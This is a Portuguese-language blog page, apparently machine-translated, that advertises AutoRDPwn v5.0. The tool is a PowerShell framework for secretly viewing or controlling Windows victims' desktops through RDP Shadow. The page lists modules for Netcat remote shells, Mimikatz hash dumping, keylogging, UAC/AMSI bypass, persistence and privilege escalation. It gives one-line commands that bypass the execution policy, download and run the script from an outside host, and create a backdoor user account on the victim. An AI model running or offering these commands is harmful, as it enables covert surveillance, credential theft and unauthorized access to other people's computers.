Browse By

AutoRDPwn v5.0 – O framework de ataque à sombra

AutoRDPwn é um framework pós-exploração criado em Powershell, projetado principalmente para automatizar o ataque Shadowem computadores Microsoft Windows. Essa vulnerabilidade (listada como um recurso pela Microsoft) permite que um invasor remoto visualize a área de trabalho de sua vítima sem o seu consentimento e até a controle sob demanda, usando ferramentas nativas do próprio sistema operacional. Graças aos módulos adicionais, é possível obter um shell remoto através do Netcat, descarregar hashes do sistema com o Mimikatz, carregar um keylogger remoto e muito mais. Tudo isso, através de um menu completamente intuitivo em sete idiomas diferentes.Além disso, é possível usá-lo em um shell reverso por meio de uma série de parâmetros descritos na seção de uso.
Requisitos
Powershell 4.0 ou superior

Mudanças 

Versão 5.0
• Novo logotipo completamente redesenhado do zero
• Tradução completa em 7 idiomas: es, pt, de, it, ru, pt
• Execução remota através de um shell reverso com UAC e AMSI Bypass
• Suporte parcial do Linux (mais informações no guia do usuário)
• Execução remota aprimorada (a conexão com a Internet não é mais necessária na vítima)
• Nova seção disponível: backdoors e persistência
• Novo módulo disponível: Keylogger remoto
• Nova seção disponível: Escalonamento de privilégios
• Novo módulo disponível: Obter informações do sistema operacional
• Novo módulo disponível: Pesquise vulnerabilidades com o Sherlock
• Novo módulo disponível: Escalar privilégios com o PowerUp 
• Nova seção disponível: Outros Módulos 
• Novo módulo disponível: Executar um script externo 
* O restante das alterações pode ser consultado no arquivo CHANGELOG 

Use
Este aplicativo pode ser usado localmente, remotamente ou para pivô entre equipes. 
Quando usado remotamente em um shell reverso, é necessário usar os seguintes parâmetros: 
-admin / -noadmin -> Dependendo das permissões que temos, usaremos um ou outro 
-nogui -> Isso evitará carregar o menu e alguns cores, garantido a sua funcionalidade 
-lang -> Vamos escolher o nosso idioma (Inglês, Espanhol, Francês, Alemão, Italiano, Russo ou Português) 
-option-> Como com o menu, podemos escolher como lançar o ataque 
-shadow -> Vamos decidir se queremos ver ou controlar o dispositivo remoto 
-createuser -> Este parâmetro é opcional, o usuário AutoRDPwn (senha: AutoRDPwn) ser criado na máquina da vítima 
Execução local em uma linha:

powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Exemplo de execução remota em uma linha:

powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

O guia detalhado de uso pode ser encontrado no seguinte link: 
https://darkbyte.net/autordpwn-la-guia-definitiva 

Screenshots

Créditos e Reconhecimentos
Esta estrutura utiliza os seguintes scripts e ferramentas:
• Enumerador Chachi de Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System de HarmJ0y & Matt Graeber -> https: // github .com / HarmJ0y / Misc-PowerShell
• Invoque-DCOM de Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoque-MetasploitPayload do Jared Haight -> https://github.com/jaredhaight / Invoke-MetasploitPayload
• Invoke-Phant0m de Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp deNikhil “SamratAshok” Mittal -> https://github.com/samratashok/nishang
• Invoque-TheHash por Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz de Benjamin Delpy -> https : //github.com/gentilkiwi/mimikatz
• PsExec de Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper da Stas’M Corp. -> https: / /github.com/stascorp/rdpwrap
• SessionGopher de Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
E muitos mais, que não se encaixam aqui .. Obrigado a todos eles e seu excelente trabalho. 

Contato
Este software não oferece nenhum tipo de garantia. Seu uso é exclusivo para ambientes educacionais e / ou auditorias de segurança com o consentimento correspondente do cliente. Eu não sou responsável por seu uso indevido ou por qualquer dano possível causado por ele. 
Para mais informações, você pode entrar em contato através de [email protected]

Baixar AutoRDPwn

One thought on “AutoRDPwn v5.0 – O framework de ataque à sombra”

Deixe uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *

Este site utiliza o Akismet para reduzir spam. Fica a saber como são processados os dados dos comentários.